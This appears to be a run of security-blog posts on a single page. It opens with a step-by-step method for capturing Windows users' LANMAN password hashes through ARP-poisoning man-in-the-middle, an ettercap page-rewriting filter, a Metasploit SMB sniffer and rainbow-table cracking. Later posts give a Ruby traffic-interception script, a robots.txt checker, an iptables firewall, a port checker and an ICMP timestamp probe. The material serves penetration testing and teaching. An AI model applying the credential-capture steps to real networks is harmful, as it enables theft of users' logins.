Goal:

To retreive a client's currently logged in credentials through manipulation of their HTTP stream (via a MITM attack). Most of the clients seen during various internal tests were pretty well firewalled and patched. However by manipulating a client's HTTP stream it was possible to have them send their username and the majority of their password hash.

Conditions:

So as with most things there are some conditions that must be inplace for this to be successful and also requirements that the credential snarfer must have sorted. Client Conditions:-:

• The target client must be using a version of IE for their browsing. During testing IE appears to be the only browser that by default sends through the resonse to the challenge of the locally logged in user that we're after.
• Must be on same netowrk segment, for the MITM attack to work of course.
• Only LANMAN hashes can be obtained this way. If the client has been configured to support NTLM only then we lose. Most default installs will not be set up this way, you may encounter more secure setups in some corporate environments.
• Only the first 7 characters are in the tables. Youll have to brute force the rest of the password.

Attacker's Rig:

• Some LMHALFCHALL rainbow tables: halflmchall_all-space_1-7.torrent (54gig) -or- halflmchall_alpha-numeric_1-7.torrent (5gig)
• Metasploit, plus Kurt Grutzmacher's exploit module smb_server.pm from here (this does not work on Windows):
  • http://metasploit.com/tools/: Looking for Framework v.2.7
  • smb_sniffer.pm
• Ettercap plus an ettercap filter to rewrite the victims web pages LMHC_etter.filter.
• Cain & Abel to perform the crypt analysis of the LMHALFCHALLENGE hashes recovered. As far as I know these rainbow tables for LMHC were created with the Cain & Abel utility winrtgen and therefore are incompatible with the patched version of rcrack.

Attacker Process:

• Fix up the IP address in the LMHC_etter.filter file to represent the host you'll be running Metasploit 2.7 & the smbsniffer exploit module from.
• Compile that with:

  etterfilter.exe -o LMHC_etter.ef LMHC_etter.filter

• Unpack Metasploit 2.7 from tha above link, place smb_sniffer.pm under the exploits/ directory.
• Install and run as root
• Metasploit commands :

  framework-2.7 $ sudo ./msfconsole msf > use smb_sniffer msf smb_sniffer > set PWFILE=/tmp/smb_sniffed.pw3

  So the SMBsniffer is waiting listening for connections fro the victims IE. So we need to rewrite some of their web requests to ensure they pass us their LMHALFCHALLENGE hashes.

• Run up ettercap using our compiled filter from earlier, to perfom the arp poisoning attack with the following:

  ettercap -Tq -M arp:remote -F /mnt/LMHC_etter.ef /GATEWAY ADDRESS/ /VICTIM ADDRESS/

• When the page gets rewritten correctly IE will attempt to make the connection and send the logged in user credentials to your waiting server.
• Resulting in a Pwdump compliant output file called smb_sniffed.pw3
• Switch to Cain & Abel for the hash cracking
• Select the hash you want to crack, right click and select Cryptanalysis Attack->HALFLM Hashes + challenge->via RainbowTables, add the tables, and crack it.

Some Other Things To Play With In The Same Eenvironment:

LSO: MSFweb 3.0 part 2 (via Milw0rm videos)

The only way we could think of getting our hands on the communication was to write a small set of scripts to trick the client and encapsulate the communication inside HTTP requests that we could then manipulate using standard proxy tools such as burp.

Although the information and scripts described in this post are focussed on intercepting a XML communication, the same principles apply to man in the middle any ASCII protocol such as smtp, ftp or pop.

update: slides available here

The first step is to trick the client to connect to our local box instead of connecting to the remote server, this is done by adjusting the hosts file.

A ruby script will sit in the middle of the communication and will be able to intercept and modify messages sent and received by the client:-

Once this is done, our attack will need three elements:

• the xmitm script.
• an external web proxy tool.
• a dummy web server.

The script will intercept the connection and send the data to the proxy. We need the dummy server (the body of the response will be the body of the request) to close the loop with the proxy (I will add some nice graphs to clarify this soon).

The original XML message is encapsulated in an HTTP request and passed through the proxy. The user can inspect and modify the message using a standard web proxy tool. The request is then forwared to a dummy *echo* web server that replies with the same payload that was requested. The script can extract the modified payload and forward it to the server.

The same process is applied to incoming messages.

Below is the main body of the script (you can also grab the code):-

# create a server that accepts connections from the client
server = TCPServer.new($local_host, $local_port)
 
while(local = server.accept ) do
  # everytime we accept a connection for the client, we open a connection
  # with the server to stablish the dialog.
  remote = TCPSocket.new($remote_host, $remote_port)
 
  # if one of the ends of the communication closes the socket, we
  # toggle this flag
  alive = true
 
  while alive do
    # see the explanation below
    result = select([local, remote], nil, nil)
 
    if result != nil then
      for socket in result[0]
 
        # detect if one end of the connection is closed and
        # close the other end
        if (socket.eof?)
          local.close
          remote.close
          alive = false
          break
        end
 
        # read the information that one peer wants to send to the other
        data = socket.gets($eom)
 
        # encapsulate the data into an HTTP proxy request
        res = Net::HTTP.new($proxy_host, $proxy_port).start do |http|
          req = Net::HTTP::Post.new("http://#{$dummyhttp_host}:#{$dummyhttp_port}/")
          req.body= data
          http.request(req)
        end
 
        modified_data = res.body.chomp
 
        # send the modified data to the other end of the connection
        if (socket == local)
          remote.puts(modified_data)
        else
          local.puts(modified_data)
        end
        socket.flush
      end
    end
  end
end

What the script does can be summarized in the following steps:

1. Create a TCP server, listening on the port the client is expecting.
2. For each connection accepted:
   • Open a connection with the remote server.
   • Wait until one end of the communication (first the client, then the server, then the client, etc.) has something to transmit.
   • Grab the XML message.
   • Put that message as a payload of a new Net::HTTP::Post request.
   • Send the request to the external web proxy.
   • Grab the body of the response given by the proxy (already modified by the user using the external proxy).
   • Send the modified request to the other end of the line.

The most interesting piece of the code is the one regarding Kernel#select function that waits for data to become available from input/output devices.

A note regarding the specifics of the protocol we were dealing with, each peer ends its messages using a special character (a NULL byte), that caracter is defined in the $eom variable and the script keeps reading the socket until that end of message character is read.

The last piece of the puzzle is the dummy HTTP server. I coded two flavours: a ruby version and a java version (not yet available for download based on the SingleFileHTTPServer example). You can pick your choice. Here is the ruby one:-

require 'webrick'
 
include WEBrick
 
# create the server, no output, disable logging
s = HTTPServer.new(
  :Port => 2000,
  :Logger => Log.new(nil, BasicLog::FATAL),
  :AccessLog => []  )
 
# the *echo* functionality
s.mount_proc("/") do |req, res|
  res.body = req.body
  res['Content-Type'] = req['Content-Type']
end
 
# clean tear down
trap('INT') { s.shutdown }
 
s.start

And this completes the XML protocol man-in-the-middle DIY kit. Hope you find it useful.

The robots exclusion standard or robots.txt protocol is a convention to prevent cooperating web spiders and other web robots from accessing all or part of a website. The information specifying the parts that should not be accessed is specified in a file called robots.txt in the top-level directory of the website.

Here is a script that checks for the presence of the file in a list of hosts (you can download the source code). Two main parts can be distinguished: command line parsing and file download.

You can call the script in two different ways. Either you do not specify the protocol (and HTTP will be used):-

./robots.sh   ...

Or you specify the protocol with:

./robots.sh  -p [http|https]   ...

Let's see how this is done:

PROTO=( http https )
HTTP=${PROTO[0]}
FILE=/tmp/robots.txt

# command line parsing
if [ "-p" == $1 ]
then
  for bar in ${PROTO[*]}
  do
    if [ $bar == $2 ];
    then
      HTTP=$2
      HOSTS=${*:3}
    fi
  done
else
  HOSTS=$*
fi

We check if the first argument is "-p" in which case, the next argument should be one of the allowed values (those in $PROTO array). If that is the case, we strip the first two parameters and put everything else in the $HOSTS variable. At the end of the code above, $HTTP will contain either http or https and $HOSTS will consist of a list of hosts whose robots.txt file existance we want to verify.

Once we know what protocol are we using and the list of targets, the only thing left is to try to download the robots.txt file of each server:-

for foo in $HOSTS; do
  echo "================"
  echo "Server: $foo ($HTTP)"
  CODE=`wget -O $FILE $HTTP://$foo/robots.txt 2>&1 | grep HTTP | head -1 | awk '{print $6}'`
  echo "Code: $CODE"
  if [ "200" == $CODE ]
  then
    echo "Contents:"
    echo "----------------"
    cat $FILE
    rm $FILE
    echo "----------------"
  fi
done

If the response code is 200 OK we cat the file to standard output. Otherwise we just move on to the next target of the list. The only tricky bit of the previous code is:

wget -O $FILE $HTTP://$foo/robots.txt 2>&1 | grep HTTP | head -1 | awk '{print $6}'

Where we try to download the file saving it to the location specified by $FILE. In order to get the HTTP error code we redirect standard error to standard output using 2>&1.

One last word, it is acknowledged that the script does not follow HTTP redirects, but if the server replies with a redirect this means that effectively, no robots.txt file is present.

#!/bin/bash

###
### IPTables config file
### Based on the rules compiled by Ranjit San aka 'the grasshopper'
### Created 2007-09-14 by Daniel Martin Gomez
### Revision 1
###

###
### define variables
###

### path to iptables
IPT=/sbin/iptables

### This contains a list of approved Debian sites to get software updates.
DEBIAN_SITES=('194.109.137.218' '212.219.56.139' '212.219.56.133' '212.219.56.134' '212.219.56.135' '212.219.56.138')

### This contains the authorised DNS servers configured in /etc/resolv.conf.
DNS_SERVERS=('')

### This is a list of external IPs that you want to allow ssh access from.
OTHER_GATEWAYS=('')

### This is a list of hosts authorised to try ICMP probes to check if the
### server is running. This could be your ISP's IPs
CONTROL_GATEWAYS=('')

### Types of ICMP probes to allow from the previous servers
ICMP_TYPES=('echo-reply' 'destination-unreachable' 'echo-request' 'ttl-exceeded')

#### NTP servers for time synch
NTP_SERVERS=('')

### ------------------------------------------------- do not change below this line

###
### INPUT
###

### will flush the chains or all rules one by one. Therefore all new rules will be created.
$IPT -F

### allows inbound packets to be processed
$IPT -P INPUT ACCEPT

### drops packets so that they can not come through one interface and flow out of another.
$IPT -P FORWARD DROP

### This allows outbound packets to be processed
$IPT -P OUTPUT ACCEPT

### allows ICMP types (defined above) for hosts in the control list
for IP in ${CONTROL_GATEWAYS[@]}; do
for ICMP in ${ICMP_TYPES[@]}; do
$IPT -A INPUT -s $IP -p icmp --icmp-type $ICMP -j ACCEPT
done
done

### this accepts connections for http and https access from anywhere
$IPT -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
$IPT -A INPUT -p tcp -m tcp --dport 443 -j ACCEPT

### this allows remote administration using ssh from your other gateways.
for IP in ${OTHER_GATEWAYS[@]}; do
$IPT -A INPUT -s $IP -p tcp -m tcp --dport 22 -j ACCEPT
done

### this allows packets to start a new connection or allows packets that are
### already associated with a connection, required for stateful inspection.
$IPT -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

### this allows NTP traffic from NTP server
for NTP in ${NTP_SERVERS[@]}; do
$IPT -A INPUT -s $NTP -p udp -m udp --sport 123 -j ACCEPT
done

### we are about to drop everything else, so first log the discarded traffic
### just in case we want to know what *they* are trying.
$IPT -A INPUT -j LOG

### this drops any traffic that does not match to the INPUT rules
$IPT -A INPUT -j DROP

###
### OUTPUT
###

### Allows traffic to authorised DNS servers
for IP in ${DNS_SERVERS[@]}; do
$IPT -A OUTPUT -d $IP -p udp -m udp --dport 53 -j ACCEPT
done

### Allows http traffic to debain sites for software updates.
### Initial config rule
for IP in ${DEBIAN_SITES[@]}; do
$IPT -A OUTPUT -d $IP -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT
done

### this allows packets to start a new connection or allows packets that are
### already associated with a connection, required for stateful inspection.
$IPT -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

### this allows NTP traffic to the NTP servers
for NTP in ${NTP_SERVERS[@]}; do
$IPT -A OUTPUT -d $NTP -p udp -m udp --dport 123 -j ACCEPT
done

### this logs all OUTPUT traffic that does not match the rules before it beign
### dropped.
$IPT -A OUTPUT -j LOG

### this drops any traffic that does not match to the OUTPUT rules
$IPT -A OUTPUT -j DROP

Just two things to add: First, do not forget to set your own values for the variables DNS_SERVERS, OTHER_GATEWAYS, CONTROL_GATEWAYS and NTP_SERVERS. And second, if you want your kung-fu up and ready after boot you may need to issue the following:-

cd /etc/init.d/
wget http://usefulfor.com/security/files/2008/06/firewall.sh
chmod +x firewall.sh
update-rc.d firewall.sh defaults

If you ever want to remove it from the boot sequence just issue:-

update-rc.d -f firewall.sh remove

Let's begin with the script. Then we can talk about the work it does.

Here is the code:

#!/usr/bin/ruby
##################################################################################################################
#
# runningserver.rb
# 12/DEC/2006
# etd [etd__at__nomejortu.com]
#
# Desc:
#   Script to create a connection on the specified port to check if a server is
#   listening on it.
#
# Version:
#   v1.0 [12/Dec/2006]: first released
#
###################################################################################################################
$help =<<eoh
#{$0}:
Script to create a connection on the specified port to check if a server is
listening on it.

Usage:
#{$0} [-h|-help|--help] [-p ]  [  ...]

Options:
-h/-help/--help:  This help message
-p :  Specify which TCP port should be tested.
Arguments:
host(s):  The different hosts to test.
EOH

#------------------------------ Input argument parsing
if (
ARGV.include?('--help')  ||
ARGV.include?('-help') ||
ARGV.include?('-h') ||
(ARGV.size==0)
) then
puts
puts $help
exit
end

# set the port number
if ARGV.include?('-p') then
p_position = ARGV.index('-p')
# read value after the -p
if ARGV[p_position+1] != nil then
$port = ARGV[p_position+1].to_i
else
puts "ERROR: you kind of need to specify the port if you use the -p parameter"
puts "t e.g: -p 8080nn"
exit
end
# clear these values in the array
ARGV[p_position] = nil
ARGV[p_position+1] = nil
end

# clear the ARGV of already parsed ARGs
hostlist = ARGV.compact

#------------------------------ Interesting stuff starts here
require 'socket'
require 'net/http'
require 'timeout'

if $port == nil then
$port=18264
end
#for each host in the command line
hostlist.each() do |host|
puts
serverstr = "No server was found in port #{$port}"
begin
Timeout::timeout(3) do
client = TCPSocket.open(host, $port)
client.close
serverstr = "Server is running on port #{$port}"
end
rescue Exception => e
serverstr = "No server was found in port #{$port}"
end
puts "#{host}: #{serverstr}"
end
puts

Because this is the first ruby script in this blog I will explain it step by step. The first thing that comes in the script is the input argument parsing. Input arguments are passed as a string array, in the variable ARGV. To check if the user is requesting help or usage information we can issue:

if (
ARGV.include?('--help')  ||
ARGV.include?('-help') ||
ARGV.include?('-h') ||
(ARGV.size==0)
) then
puts
puts $help
exit
end

In the same way the script checks if the user has supplied a port number. If this is not the case, we use a default port. If the input argument -p is present, we asume the next argument (p_position+1) to be the TCP port number. It is important to get the port number as an interger. We accomplish this by issuing the .to_i call.

# clear these values in the array
ARGV[p_position] = nil
ARGV[p_position+1] = nil

With the code above we clear the elements we are not using any more. Doing so we can compact the ARGV array in order to remove all the nil elements of it just by calling the .compact function of the array.

The body of the script is pretty straight forward. For each host given as input to the script we try to open a socket on the specified port. If successful, we close the socket and that's it. To avoid hanging for ever on closed ports we are using timeout library (require 'timeout'). The timeout mechanism is very simple. You create a block and give the timeout in seconds (can be a float point value). If the block terminates before the timeout, timeout returns the value of the block. Otherwise, the exception (Timeout::Error) is raised.

begin
Timeout::timeout(3) do
#code
end
rescue Exception => e
#exception handling
end

You see? It wasn't that difficult, was it?

If your machine answers ICMP Timestamp messages an attacker can learn the date which is set on your machine. This may help him to defeat all your time based authentication protocols.

Here is the code of a script that can be used to check if a remote host listens Timestamp requests:

# Check if the script is being run as root exit if it is not.
if [ "$UID" -ne "0" ]
then
  echo "[ERROR] This script must be run as root"
  exit 1
fi

for foo in $*; do
  echo -n "$foo "
  output=`hping3 -c 3 --icmp-ts $foo 2>/dev/null | grep "ICMP timestamp" | wc -l`
  if (( output > 0  ))
  then
    echo "reacts to ICMP timestamp."
  else
    echo "doesn't react."
  fi
done

First we need to check that root is the one running the script because otherwise we won't be able to craft ICMP packages. For this task we will be using hping (i.e: hping3 package in Debian GNU/Linux).

The script just sends three (-c 3) ICMP Timestamps (--icmp-ts) to each of the hosts feeded in the command line. We grep the output of hping3 looking for the magic string "ICMP timestamp", and if found, we print a success message.